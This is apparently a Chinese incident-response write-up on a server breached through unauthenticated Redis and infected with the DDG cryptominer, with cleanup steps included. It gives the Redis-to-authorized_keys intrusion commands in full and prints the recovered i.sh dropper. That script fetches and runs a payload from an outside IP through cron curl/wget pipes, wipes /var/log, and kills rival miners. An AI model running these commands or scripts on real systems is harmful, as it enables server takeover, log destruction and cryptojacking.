入侵原理
攻击者通过redis连接服务器在服务器上写入ssh免密登录的公钥
-
生成 ssh 公私钥文件, 写入待发送文件
ssh-keygen -t rsa -C "xxx”echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n" > foo
-
连接目标服务器
redis服务并清除所有数据
redis-cli -h 12.34.56.78flushall
-
将公钥写入目标机器的
authorized_keys文件
cat foo | redis-cli -h 12.34.56.78 -x set crackitredis-cli -h 12.34.56.78config set dir /root/.ssh/config get dirconfig set dbfilename "authorized_keys"
-
远程登录目标服务器
ssh root@12.34.56.78
解决流程
解决步骤:
- 关闭
redis未授权端口 - 清理被写入的
authorized_keys - 清除
/var/spool/cron目录下的定时任务 - 杀死进程
qW3xT.4和ddgs.3016 - 删除
/tmp下的执行文件qW3xT.4和ddgs.3016
分析如下:
-
服务器
top占用,存在两个异常线程qW3xT.4,ddgs.3016 -
定位两个进程的位置
- linux在启动一个进程时,系统会在
/proc下创建一个以PID为名称的文件夹,在这个文件夹下有这个进程的详细信息exe符号连接就是执行程序的绝对路径;执行程序在/tmp下 find / -name qW3xT.4,find / -name ddgs.3016;执行程序在/tmp
- linux在启动一个进程时,系统会在
-
清除
/tmp下的两个执行文件,过一会儿会再次生成./var/spool/cron目录下 存在计划任务root(或crontab -l&&crontab -r查询且清除)
*/15 * * * * curl -fsSL http://216.155.135.37:8000/i.sh | sh计划任务抓取拉取的i.sh如下
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://216.155.135.37:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://216.155.135.37:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://216.155.135.37:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://216.155.135.37:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
rm -rf /var/cache /var/log
ps auxf | grep -v grep | grep /tmp/ddgs.3016 || rm -rf /tmp/ddgs.3016
if [ ! -f "/tmp/ddgs.3016" ]; then
wget -q http://216.155.135.37:8000/static/3016/ddgs.$(uname -m) -O /tmp/ddgs.3016
curl -fsSL http://216.155.135.37:8000/static/3016/ddgs.$(uname -m) -o /tmp/ddgs.3016
fi
chmod +x /tmp/ddgs.3016 && /tmp/ddgs.3016
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
1. 下载自身并执行写入定时任务
2. `rm -rf /var/cache /var/log`清空系统登录日志
3. 下载主文件`ddgs.3016`并执行
4. 杀死系统中的其他挖矿进程
- 去脚本中的地址
http://216.155.135.37:8000/static/查看,存在如下文件
disable.sh如下:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
mkdir -p /opt/yilu/work/xig /opt/yilu/work/xige /usr/bin/bsd-port
touch /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
chmod -x /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
chattr +i /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
ps auxf | grep -v grep | grep /tmp/thisxxs | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /opt/yilu/work/xig/xig | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /opt/yilu/mservice | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /usr/bin/bsd-port/getty | awk '{print $2}' | xargs kill
此脚本也是限制其他挖空程序运行, yilu 地址https://www.yiluzhuanqian.com/
吾爱破解上对此病毒3014的分析 DDG最新变种3014样本分析
